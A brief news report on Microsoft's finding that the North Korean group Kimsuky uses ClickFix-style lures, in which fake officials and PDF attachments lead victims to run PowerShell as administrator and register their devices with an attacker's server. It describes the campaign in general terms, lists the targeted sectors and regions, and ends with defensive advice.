The North Korean state-sponsored hacking group Kimsuky (also known as Emerald Sleet or Velvet Chollima) has implemented a new social engineering strategy inspired by ClickFix campaigns. Microsoft’s Threat Intelligence team has identified this sophisticated attack pattern targeting international organizations.

The attack begins with threat actors posing as South Korean government officials to establish trust with potential victims. Once rapport is built, they send spear-phishing emails containing PDF attachments. Victims attempting to access these documents are redirected to a fraudulent device registration page, where they’re instructed to execute PowerShell commands with administrator privileges.

The malicious code deploys a browser-based remote desktop tool and installs a certificate using a predetermined PIN, ultimately registering the victim’s device with the attacker’s server. This grants hackers direct access for data theft.

Since January 2025, these targeted attacks have affected:
– International affairs organizations
– NGOs
– Government agencies
– Media companies
across North America, South America, Europe, and East Asia.

Microsoft has alerted affected customers and emphasizes the importance of treating unsolicited communications with extreme caution. This adaptation of ClickFix tactics by a nation-state actor demonstrates the method’s effectiveness in cyber espionage operations. Users are strongly advised against executing unknown code with administrator privileges, particularly when copied from online sources.